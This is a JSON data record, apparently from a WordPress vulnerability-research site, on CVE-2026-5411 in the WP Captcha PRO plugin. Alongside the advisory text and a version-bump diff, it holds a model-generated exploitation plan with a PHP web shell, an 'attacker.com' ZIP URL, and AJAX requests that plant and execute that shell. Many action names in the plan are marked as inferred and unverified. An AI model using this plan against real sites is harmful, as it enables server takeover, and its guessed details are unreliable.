[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fDoUWVpiz0ciYdnP5ugHuI-pjSOV4NiXof0ef-TMmLO8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":24,"research_verified":25,"research_rounds_completed":26,"research_plan":27,"research_summary":28,"research_vulnerable_code":9,"research_fix_diff":29,"research_exploit_outline":30,"research_model_used":31,"research_started_at":32,"research_completed_at":33,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":25,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":25,"source_links":34},"CVE-2026-5411","wp-captcha-pro-missing-authorization-to-authenticated-subscriber-arbitrary-file-upload","WP Captcha PRO \u003C= 5.38 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Upload","The WP Captcha PRO (the premium version of the Advanced Google reCAPTCHA plugin, both have the same slug) plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 5.38. This is due to a capability check in the save_ajax() function of the licensing module, combined with unrestricted file extraction in sync_cloud_protection(). This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files including PHP webshells to the server by injecting a malicious cloud_protection_url into the license meta, which the plugin then downloads and extracts without file type validation into a web-accessible uploads directory. This can be used for remote code execution. Note: The vulnerability can only be exploited with a remote URL if \"allow_url_fopen\" is enabled in the php.ini config.","advanced-google-recaptcha",null,"\u003C=5.38","5.39","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-06-05 05:58:17","2026-06-05 18:31:12",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F92652339-ec86-4069-aeee-91c314ed2540?source=api-prod",1,[22,23],"advanced-google-recaptcha.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-5411 (WP Captcha PRO)\n\n## 1. Vulnerability Summary\nThe **WP Captcha PRO** (premium version of Advanced Google reCAPTCHA) is vulnerable to **Remote Code Execution (RCE)** via an authenticated arbitrary file upload. The vulnerability stems from two primary failures:\n1.  **Missing Authorization:** The `save_ajax()` function in the licensing module (likely within a file like `libs\u002Flicensing.php` or `libs\u002Fajax-pro.php`) lacks a sufficient capability check, allowing users with `Subscriber` roles to modify license-related metadata.\n2.  **Unrestricted Extraction:** The `sync_cloud_protection()` function (inferred) downloads a ZIP file from a user-provided URL (`cloud_protection_url`) and extracts its contents into a web-accessible directory without validating the file types within the archive.\n\n## 2. Attack Vector Analysis\n*   **Target Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Vulnerable Action:** `wpcaptcha_save_ajax` or `wpcaptcha_save_license` (inferred from the `save_ajax()` function name).\n*   **Payload Parameter:** `cloud_protection_url` (injected into license meta).\n*   **Authentication:** Authenticated, `Subscriber` level or higher.\n*   **Preconditions:** `allow_url_fopen` must be enabled in `php.ini` for the remote download to succeed.\n\n## 3. Code Flow (Inferred from Patch Description)\n1.  **Entry Point:** An authenticated user (Subscriber) sends a POST request to `admin-ajax.php` with a specific action (e.g., `action=wpcaptcha_save_settings` or similar).\n2.  **Authorization Bypass:** The `save_ajax()` function fails to verify that the current user has `manage_options` capabilities. It only verifies authentication or uses a weak check.\n3.  **Meta Injection:** The attacker provides a URL in the `cloud_protection_url` parameter. The plugin saves this into the `wpcaptcha_meta` option or a similar configuration key.\n4.  **Extraction Trigger:** The plugin invokes `sync_cloud_protection()`. This may happen immediately after saving or via a separate AJAX action (e.g., `action=wpcaptcha_sync_cloud`).\n5.  **Sink:** `sync_cloud_protection()` uses `file_get_contents` or `copy` (facilitated by `allow_url_fopen`) to download a ZIP from the malicious URL and uses the `PclZip` library or `ZipArchive` to extract it into `\u002Fwp-content\u002Fuploads\u002Fwpcaptcha\u002F` (inferred) without filtering `.php` files.\n\n## 4. Nonce Acquisition Strategy\nThe licensing module likely localizes a nonce for its AJAX operations. \n1.  **Identify Page:** Licensing settings are usually found at `\u002Fwp-admin\u002Fadmin.php?page=advanced-google-recaptcha-license` or within a tab in the main settings.\n2.  **Navigate:** Use `browser_navigate` to visit the plugin settings page as a Subscriber.\n3.  **Extract:** Use `browser_eval` to find the nonce. The plugin enqueues scripts in `WPCaptcha_Admin::admin_enqueue_scripts`.\n    *   **Inferred Variable:** `window.wpcaptcha_admin?.nonce` or `window.wpcaptcha_licensing?.nonce`.\n    *   **Inferred Action:** The nonce is likely created with `wp_create_nonce('wpcaptcha_nonce')` or `wp_create_nonce('wpcaptcha_license_nonce')`.\n\n## 5. Exploitation Strategy\n### Step 1: Prepare Malicious Payload\nCreate a ZIP archive named `shell.zip` containing a simple PHP backdoor:\n```php\n\u003C?php echo shell_exec($_GET['cmd']); ?>\n```\nHost this file on a remote server (e.g., `http:\u002F\u002Fattacker.com\u002Fshell.zip`).\n\n### Step 2: Inject Malicious URL\nSend an AJAX request to update the license metadata.\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Body (URL-Encoded):**\n    ```\n    action=wpcaptcha_save_ajax&cloud_protection_url=http:\u002F\u002Fattacker.com\u002Fshell.zip&_wpnonce=[EXTRACTED_NONCE]\n    ```\n\n### Step 3: Trigger Synchronization\nThe sync might be automatic, but if not, trigger it manually:\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Body (URL-Encoded):**\n    ```\n    action=wpcaptcha_sync_cloud_protection&_wpnonce=[EXTRACTED_NONCE]\n    ```\n\n### Step 4: Execution\nAccess the uploaded shell.\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-content\u002Fuploads\u002Fwpcaptcha\u002Fshell.php?cmd=id`\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Install \"Advanced Google reCAPTCHA\" (PRO version) \u003C= 5.38.\n2.  **User Creation:** Create a Subscriber user:\n    `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n3.  **PHP Config:** Ensure `allow_url_fopen = On` in the environment's `php.ini`.\n4.  **Host ZIP:** Host a ZIP file containing `shell.php` on a reachable web server.\n\n## 7. Expected Results\n*   The `save_ajax` request should return a success JSON response (e.g., `{\"success\":true}`).\n*   The `sync` operation should download the ZIP and extract it.\n*   A GET request to the shell URL should return the output of the `id` command.\n\n## 8. Verification Steps\nAfter the HTTP exploit, verify the file's existence and content via WP-CLI:\n```bash\n# Check if the directory exists\nls -R \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fwpcaptcha\u002F\n\n# Check the content of the uploaded file\ncat \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fwpcaptcha\u002Fshell.php\n\n# Check the stored option\u002Fmeta\nwp option get wpcaptcha_meta\n```\n\n## 9. Alternative Approaches\n*   **Tab Persistence:** If `save_ajax` is not the correct action, look for `wpcaptcha_save_settings` in `libs\u002Fajax.php`. The premium version might hook into the same handler but allow additional keys like `cloud_protection_url`.\n*   **Direct Meta Update:** Check if the plugin uses `update_user_meta` or `update_post_meta` in a way that allows a Subscriber to overwrite global plugin options.\n*   **Path Traversal:** If the extraction allows path traversal (e.g., filenames like `..\u002F..\u002Fshell.php`), attempt to write the shell directly into the plugin directory.","The WP Captcha PRO plugin (premium version of Advanced Google reCAPTCHA) is vulnerable to authenticated arbitrary file upload leading to Remote Code Execution (RCE). A missing capability check in the licensing module's AJAX handler allows Subscriber-level users to modify plugin settings, specifically a remote ZIP file URL that the plugin subsequently downloads and extracts without validating the file types within the archive.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fadvanced-google-recaptcha\u002F1.35\u002Fadvanced-google-recaptcha.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fadvanced-google-recaptcha\u002F5.39\u002Fadvanced-google-recaptcha.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fadvanced-google-recaptcha\u002F1.35\u002Fadvanced-google-recaptcha.php\t2026-05-05 18:47:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fadvanced-google-recaptcha\u002F5.39\u002Fadvanced-google-recaptcha.php\t2026-06-08 20:27:10.000000000 +0000\n@@ -3,7 +3,7 @@\n   Plugin Name: Advanced Google reCAPTCHA\n   Plugin URI: https:\u002F\u002Fgetwpcaptcha.com\u002F\n   Description: Advanced Google reCAPTCHA will safeguard your WordPress site from spam comments and brute force attacks. With this plugin, you can easily add Google reCAPTCHA to WordPress comment form, login form and other forms.\n-  Version: 1.35\n+  Version: 5.39\n   Author: WebFactory Ltd\n   Author URI: https:\u002F\u002Fwww.webfactoryltd.com\u002F\n   License: GNU General Public License v3.0\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fadvanced-google-recaptcha\u002F1.35\u002Freadme.txt \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fadvanced-google-recaptcha\u002F5.39\u002Freadme.txt\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fadvanced-google-recaptcha\u002F1.35\u002Freadme.txt\t2026-05-05 18:47:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fadvanced-google-recaptcha\u002F5.39\u002Freadme.txt\t2026-06-08 20:27:10.000000000 +0000\n@@ -5,7 +5,7 @@\n Requires at least: 4.9\n Requires PHP: 5.6\n Tested up to: 7.0\n-Stable tag: 1.35\n+Stable tag: 5.39\n License: GPLv3\n License URI: http:\u002F\u002Fwww.gnu.org\u002Flicenses\u002Fgpl-3.0.html\n \n@@ -75,6 +75,9 @@\n 9. Plugin settings\n \n == Changelog ==\n+= 5.39 - 08\u002F06\u002F2026 =\n+* Updated the free version number to keep the free and PRO releases aligned and avoid confusion around public security advisories. The reported issue (CVE-2026-5411) affected the PRO version only (not the free one) and was already patched, but because both versions share the same plugin slug, some users and automated tools could and did misinterpret the version numbers. Aligning the free version with the PRO version makes it clearer that the installed plugin is current and helps prevent unnecessary concerns\n+\n = 1.35 - 05\u002F05\u002F2026 =\n * Added option to customize \"Are you human? Please solve:\" text\n * Fixed reCaptcha v3 token expiration","The exploit is achieved by an authenticated Subscriber user through the following steps: 1) Identify the AJAX nonce used for licensing or admin actions, typically found within the dashboard source. 2) Send a POST request to admin-ajax.php with an action like 'wpcaptcha_save_ajax' containing a 'cloud_protection_url' parameter set to a remote server hosting a malicious ZIP file. 3) Trigger the synchronization function, which downloads the ZIP via file_get_contents (requiring allow_url_fopen) and extracts its contents, including PHP shells, into the \u002Fwp-content\u002Fuploads\u002Fwpcaptcha\u002F directory. 4) Execute the uploaded PHP shell by navigating to its direct URL.","gemini-3-flash-preview","2026-06-26 03:57:58","2026-06-26 03:58:37",{"type":35,"vulnerable_version":36,"fixed_version":11,"vulnerable_browse":37,"vulnerable_zip":38,"fixed_browse":39,"fixed_zip":40,"all_tags":41},"plugin","1.35","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-google-recaptcha\u002Ftags\u002F1.35","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-google-recaptcha.1.35.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-google-recaptcha\u002Ftags\u002F5.39","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-google-recaptcha.5.39.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-google-recaptcha\u002Ftags"]